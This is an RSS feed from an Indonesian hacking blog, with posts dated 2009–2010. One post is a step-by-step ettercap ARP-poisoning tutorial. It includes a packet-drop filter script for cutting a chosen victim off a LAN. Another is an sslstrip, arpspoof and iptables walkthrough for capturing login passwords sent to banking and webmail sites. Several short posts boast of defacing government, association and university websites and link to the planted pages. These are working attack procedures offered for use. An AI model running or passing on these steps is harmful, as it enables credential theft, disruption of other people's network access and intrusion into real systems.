<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>dhymaz_spyro &#187; hack</title>
	<atom:link href="http://dhymazspyro.com/category/hack/feed" rel="self" type="application/rss+xml" />
	<link>http://dhymazspyro.com</link>
	<description>.</description>
	<lastBuildDate>Thu, 02 Sep 2010 12:14:21 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Mematikan Koneksi Komputer Client dalam jaringan LAN ^_^ (devil)</title>
		<link>http://dhymazspyro.com/mematikan-koneksi-komputer-client-dalam-jaringan-lan-_-devil.kotak</link>
		<comments>http://dhymazspyro.com/mematikan-koneksi-komputer-client-dalam-jaringan-lan-_-devil.kotak#comments</comments>
		<pubDate>Fri, 07 May 2010 10:55:43 +0000</pubDate>
		<dc:creator>dhymaz_spyro</dc:creator>
				<category><![CDATA[Kampuzkuw]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[mematikan koneksi]]></category>
		<category><![CDATA[tutorial ettercap]]></category>

		<guid isPermaLink="false">http://dhymazspyro.com/?p=126</guid>
		<description><![CDATA[akhir2 ini gw lumayan dongkol dengan koneksi dikesekretariatan bersama dikampuz gw yang dimana jaringan internetnya dalam 1 jaringan.. awalnya kendalanya adalah client yang make hub dan sering ganti2 ip sementara sudah dapat jatah IP masing2. geram sih gw. tapi mau diapalah.. gw cuma bisa monitoring. untung gw make LINUX. hehe. lama kelamaan makin menjadi-jadi setelah [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg"><img alt="" src="http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg" title="poisoning" class="aligncenter" width="550" height="312" /></a></p>
<p>akhir2 ini gw lumayan dongkol dengan koneksi dikesekretariatan bersama dikampuz gw yang dimana jaringan internetnya dalam 1 jaringan.. awalnya kendalanya adalah client yang make hub dan sering ganti2 ip sementara sudah dapat jatah IP masing2. geram sih gw. tapi mau diapalah.. gw cuma bisa monitoring. untung gw make LINUX. hehe.<span id="more-126"></span> lama kelamaan makin menjadi-jadi setelah keterangan dari <a href="http://www.google.com/url?sa=t&#038;source=web&#038;ct=res&#038;cd=1&#038;ved=0CBwQFjAA&#038;url=http%3A%2F%2Fwww.wireshark.org%2F&#038;ei=FOrjS5aaIoawrAer7p2PAw&#038;usg=AFQjCNHE63N0oC3FKruR4eA0xdxI87juZg">wireshark</a> menayangkan error yang sangat banyak, keterangan errornya adalah duplicate IP yang random. setiap hostname tersebut OL, pasti jaringan kacau. hostnamenya adalah &#8220;NUMPANK-OM&#8221;. ternyata komputer tersebut kena virus yang bikin kacau jaringan. inisiatif gw bagi tugas dengan temen gw aji. hehe, kayak FBI aja. dia ngecut koneksi dari IP yang bermasalah tersebut dan ngeflood balik. mau gak mau harus seperti itu, kalo nggak ya semua client pada kacau. tapi tetep gak kapok n kayaknya semua yang pake windus mulai terinfeksi.. (doh) payah ni sistem operasi satu nih. ya udah, gw coba cara yang menurut gw ampuh ini.. hehe. yaitu dengan metode ARP POISONING. gak usah dijelasin, langsung praktek aja yah. implementasinya begini :</p>
<p>(disarankan untuk memakai LINUX)<br />
1. install ettercap<br />
2. jalankan ettercap<br />
3. pilih sniff -> unnified sniffing -> dan pilih interface yang terkoneksi tersebut.</p>
<blockquote><p>Listening on eth1&#8230; (Ethernet)</p>
<p>  eth1 ->	00:16:E6:DC:F1:DB       172.16.30.7     255.255.255.0</p>
<p>SSL dissection needs a valid &#8216;redir_command_on&#8217; script in the etter.conf file<br />
Privileges dropped to UID 65534 GID 65534&#8230;</p>
<p>  28 plugins<br />
  39 protocol dissectors<br />
  53 ports monitored<br />
7587 mac vendor fingerprint<br />
1698 tcp OS fingerprint<br />
2183 known services</p></blockquote>
<p>4. kemudian pilih host -> scan for host (tunggu sampai scanning selesai.</p>
<blockquote><p>Randomizing 255 hosts for scanning&#8230;<br />
Scanning the whole netmask for 255 hosts&#8230;<br />
30 hosts added to the hosts list&#8230;</p></blockquote>
<p>5. kemudian pilih host -> host list<br />
   disitu ada list ip client yang sedang OL, contohnya salah satunya : 172.16.30.6 <- ini adalah IP victim yang akan kita putuskan koneksinya. klik di IP tersebut dan klik "add to target 1"</p>
<blockquote><p>Host 172.16.30.6 added to TARGET1</p></blockquote>
<p>6. kemudian buat file (terserah mau pake kate,gedit,atai apapun editor kesenangan anda) dan masukkan script ini : </p>
<blockquote><p>if (ip.src == &#8217;172.16.30.6&#8242; || ip.dst == &#8217;172.16.30.6&#8242;) {<br />
drop();<br />
kill();<br />
msg(&#8220;Packet Dropped\n&#8221;);<br />
}</p></blockquote>
<p>nb : ip 172.16.30.6 disesuaikan dengan IP target anda<br />
fite tersebut save ke dalam bentuk *.eft &#8211; ex: target.eft</p>
<p>7. convert file tersebut ke target.ef dan copy ke /usr/share/ettercap/<br />
spyro@dhymaz-chua:~$ sudo etterfilter target.eft -o target.ef<br />
spyro@dhymaz-chua:~$ sudo cp target.ef /usr/share/ettercap/</p>
<p>8. kembali ke ettercap, kemudiam pilih mitm -> arp poisoning -> centang &#8220;sniff remote connection&#8221; dan klik ok.</p>
<blockquote><p>ARP poisoning victims:</p>
<p> GROUP 1 : 172.16.30.6 00:14:85:2D:50:3B</p>
<p> GROUP 2 : ANY (all the hosts in the list)</p></blockquote>
<p>9. klik filters -> load a filter dan pilih file target.ef tadi yang telah dibuat.</p>
<blockquote><p>GROUP 2 : ANY (all the hosts in the list)<br />
Content filters loaded from /usr/share/ettercap/sekber.ef&#8230;</p></blockquote>
<p>10. dan saya telah memastikannya, ngeping ke server lancar, ngeping ke internet lancar, ngeping ke ip victim lancar, tapi victim tidak akan bisa konek ke internet.</p>
<p>begitulah kurang lebih penjelasannya. selamat mencoba&#8230; (target yang saya serang dalam membuat artikelini menggunakan windows).<br />
ettercap juga bisa dipakai untuk mematikan gateway. wow seremm.. haha.. masih banyak lagi yang bisa dilakukan oleh ettercap.. pinter2 explorasi aja yaa ^_^</p>
<p>regards : dhymaz_spyro</p>
]]></content:encoded>
			<wfw:commentRss>http://dhymazspyro.com/mematikan-koneksi-komputer-client-dalam-jaringan-lan-_-devil.kotak/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Penetrate into the DEPKUMHAM (hacked for happy new year all)</title>
		<link>http://dhymazspyro.com/penetrate-into-the-depkumham-hacked-for-happy-new-year-all.kotak</link>
		<comments>http://dhymazspyro.com/penetrate-into-the-depkumham-hacked-for-happy-new-year-all.kotak#comments</comments>
		<pubDate>Wed, 06 Jan 2010 11:39:01 +0000</pubDate>
		<dc:creator>dhymaz_spyro</dc:creator>
				<category><![CDATA[Aneh-Aneh]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://dhymazspyro.com/?p=50</guid>
		<description><![CDATA[klik gambar untuk memperbesar gambar.. see this..]]></description>
			<content:encoded><![CDATA[<p><a href="http://img141.imageshack.us/img141/6045/screenshot1in.png"><img title="supernova" src="http://img141.imageshack.us/img141/6045/screenshot1in.png" alt="" width="500" height="300" /></a><br />
klik gambar untuk memperbesar gambar..</p>
<p><a href="http://www.depkumham.go.id/NR/rdonlyres/F4A50352-9B98-45D6-AE38-FF94549E1962/0/imhere.html">see this..</a></p>
]]></content:encoded>
			<wfw:commentRss>http://dhymazspyro.com/penetrate-into-the-depkumham-hacked-for-happy-new-year-all.kotak/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Penetrate into the PERPAMSI (hacked mode : ON)</title>
		<link>http://dhymazspyro.com/penetrate-into-the-perpamsi-hacked-mode-on.kotak</link>
		<comments>http://dhymazspyro.com/penetrate-into-the-perpamsi-hacked-mode-on.kotak#comments</comments>
		<pubDate>Wed, 06 Jan 2010 11:36:14 +0000</pubDate>
		<dc:creator>dhymaz_spyro</dc:creator>
				<category><![CDATA[Aneh-Aneh]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://dhymazspyro.com/?p=48</guid>
		<description><![CDATA[klik gambar untuk memperbesar gambar.. see this&#8230;]]></description>
			<content:encoded><![CDATA[<p><a href="http://img141.imageshack.us/img141/7562/screenshotx.png"><img title="supernova" src="http://img141.imageshack.us/img141/7562/screenshotx.png" alt="" width="500" height="300" /></a><br />
klik gambar untuk memperbesar gambar..</p>
<p><a href="http://perpamsi.org/gallery/document/2a560ad12466efe6e7f59729aecad3951261908343.html">see this&#8230;</a> </p>
]]></content:encoded>
			<wfw:commentRss>http://dhymazspyro.com/penetrate-into-the-perpamsi-hacked-mode-on.kotak/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>how to : https protocol hacking</title>
		<link>http://dhymazspyro.com/how-to-https-protocol-hacking.kotak</link>
		<comments>http://dhymazspyro.com/how-to-https-protocol-hacking.kotak#comments</comments>
		<pubDate>Sun, 13 Dec 2009 18:54:08 +0000</pubDate>
		<dc:creator>dhymaz_spyro</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[nge-bacrit]]></category>

		<guid isPermaLink="false">http://dhymazspyro.com/?p=43</guid>
		<description><![CDATA[hufftt.. sekian lama vakum didunia underground, baru sempat nambah-nambah ilmu lagi.. ok,sedikit nge-bacrit : awalnya penasaram, untuk apa sih dibuat protocol https seperti login yahoo, bank mandiri dan sebagainya? yup, betul.. secara gw males jelasin, pahami aja disini. :D setelah jungkir balik kanan kiri guling-guling sampe gelas kopi pecah, akhirnya dapet suatu software yang yaa [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://thumb1.shutterstock.com.edgesuite.net/display_pic_with_logo/240565/240565,1231428624,1/stock-photo--d-image-hypertext-transfer-protocol-secure-https-security-protocol-for-online-transaction-22957705.jpg"><img title="https" src="http://thumb1.shutterstock.com.edgesuite.net/display_pic_with_logo/240565/240565,1231428624,1/stock-photo--d-image-hypertext-transfer-protocol-secure-https-security-protocol-for-online-transaction-22957705.jpg" alt="" width="400" height="200" /></a><br />
hufftt.. sekian lama vakum didunia underground, baru sempat nambah-nambah ilmu lagi.. ok,sedikit nge-bacrit :<br />
awalnya penasaram, untuk apa sih dibuat protocol https seperti login yahoo, bank mandiri dan sebagainya? yup, betul.. secara gw males jelasin, pahami aja <a href="http://en.wikipedia.org/wiki/HTTP_Secure">disini</a>. :D<span id="more-43"></span></p>
<p>setelah jungkir balik kanan kiri guling-guling sampe gelas kopi pecah, akhirnya dapet suatu software yang yaa lumayan menurutku untuk menghack protocol https alias ssl hijacking. keterangannya silahkan baca <a href="http://www.thoughtcrime.org/software/sslstrip/">disini</a> atau <a href="http://hackaday.com/2009/02/23/sslstrip-hijacking-ssl-in-network/">disini</a> dan juga <a href="http://www.ilmuhacking.com/web-security/mitm-attack-mandiri-internet-banking-using-sslstrip/">disini</a> dan masih banyak lagi&#8230;</p>
<p>nge-bacrit selesai.. langsung ke TKP :</p>
<p>1. semisal aja,<br />
<strong>attacker : 172.192.30.30<br />
victim : 172.192.30.40<br />
gateway : 172.192.30.254</strong><br />
<em><br />
information : artikel ini menggunakan sistem operasi linux</em></p>
<p>2. command : sslstrip<br />
manual options:<br />
-w , –write= Specify file to log to (optional).<br />
-p , –post Log only SSL POSTs. (default)<br />
-s , –ssl Log all SSL traffic to and from server.<br />
-a , –all Log all SSL and HTTP traffic to and from server.<br />
-l , –listen= Port to listen on (default 10000).<br />
-f , –favicon Substitute a lock favicon on secure requests.<br />
-k , –killsessions Kill sessions in progress.<br />
-h Print this help message</p>
<p>3 . execute :<br />
root@spyro:~# sslstrip -a -w logfilename</p>
<p>4. execute arpspoof of the victim :<br />
root@spyro:~# arpspoof -i vmnet1 -t 172.192.30.40 172.192.30.254</p>
<p>5. activate a ip_forward function :<br />
root@spyro:~# echo 1 > /proc/sys/net/ipv4/ip_forward </p>
<p>6. redirect http port victim communication to sslstrip port<br />
root@spyro:~# iptables -t nat -A PREROUTING -p tcp &#8211;dport 80 -j REDIRECT &#8211;to-port 10000</p>
<p>nah, ketika victim melakukan login ke port https, maka username n passwordnya akan tercatat di log file dump yang kita buat (dalam artikel ini nama filenya &#8220;logfilename&#8221;)</p>
<p>7. view a dump log file :<br />
root@spyro:~# cat logfilename | grep -i &#8220;passwd=&#8221;</p>
<p>lihat dan cari kata kunci &#8220;login=&#8221; dan &#8220;passwd=&#8221;<br />
ex : login=dhymaz_spyro&#038;passwd=djancuukkk</p>
<p>thankz to laharisi</p>
]]></content:encoded>
			<wfw:commentRss>http://dhymazspyro.com/how-to-https-protocol-hacking.kotak/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>AMIKOM.AC.ID dihack untuk kedua kalinya dalam 1 hari</title>
		<link>http://dhymazspyro.com/amikom-ac-id-dihack-untuk-kedua-kalinya-dalam-1-hari.kotak</link>
		<comments>http://dhymazspyro.com/amikom-ac-id-dihack-untuk-kedua-kalinya-dalam-1-hari.kotak#comments</comments>
		<pubDate>Thu, 19 Nov 2009 09:20:19 +0000</pubDate>
		<dc:creator>dhymaz_spyro</dc:creator>
				<category><![CDATA[hack]]></category>
		<category><![CDATA[nge-bacrit]]></category>

		<guid isPermaLink="false">http://dhymazspyro.com/?p=16</guid>
		<description><![CDATA[klik gambar untuk memperbesar gambar.. untuk kedua kalinya pada pukul 15.10 http://amikom.ac.id dihack kembali by anaktk. lagi lagi buat pembelajaran ajalah buat amikom.. :p]]></description>
			<content:encoded><![CDATA[<p><a href="http://img406.imageshack.us/img406/9620/amikomg.png"><img title="amikomhack" src="http://img406.imageshack.us/img406/9620/amikomg.png" alt="" width="500" height="300" /></a><br />
klik gambar untuk memperbesar gambar..</p>
<p>untuk kedua kalinya pada pukul 15.10 <a href="http://amikom.ac.id">http://amikom.ac.id</a> dihack kembali by anaktk. lagi lagi buat pembelajaran ajalah buat amikom.. :p</p>
]]></content:encoded>
			<wfw:commentRss>http://dhymazspyro.com/amikom-ac-id-dihack-untuk-kedua-kalinya-dalam-1-hari.kotak/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>AMIKOM.AC.ID is Hacked by &#8220;anaktk&#8221;</title>
		<link>http://dhymazspyro.com/amikom-ac-id-is-hacked-by-anaktk.kotak</link>
		<comments>http://dhymazspyro.com/amikom-ac-id-is-hacked-by-anaktk.kotak#comments</comments>
		<pubDate>Thu, 19 Nov 2009 06:12:04 +0000</pubDate>
		<dc:creator>dhymaz_spyro</dc:creator>
				<category><![CDATA[hack]]></category>
		<category><![CDATA[nge-bacrit]]></category>

		<guid isPermaLink="false">http://dhymazspyro.com/?p=13</guid>
		<description><![CDATA[klik gambar untuk memperbesar gambar.. sekolah tinggi sekelas amikom berhasil dihack&#8230; semoga ini menjadi pelajaran.. xixixixixixixi ^_^]]></description>
			<content:encoded><![CDATA[<p><a href="http://img266.imageshack.us/img266/7227/screenshotgvn.png"><img title="supernova" src="http://img266.imageshack.us/img266/7227/screenshotgvn.png" alt="" width="500" height="300" /></a><br />
klik gambar untuk memperbesar gambar..</p>
<p>sekolah tinggi sekelas <a href="http://amikom.ac.id">amikom</a> berhasil dihack&#8230; semoga ini menjadi pelajaran.. xixixixixixixi ^_^</p>
]]></content:encoded>
			<wfw:commentRss>http://dhymazspyro.com/amikom-ac-id-is-hacked-by-anaktk.kotak/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
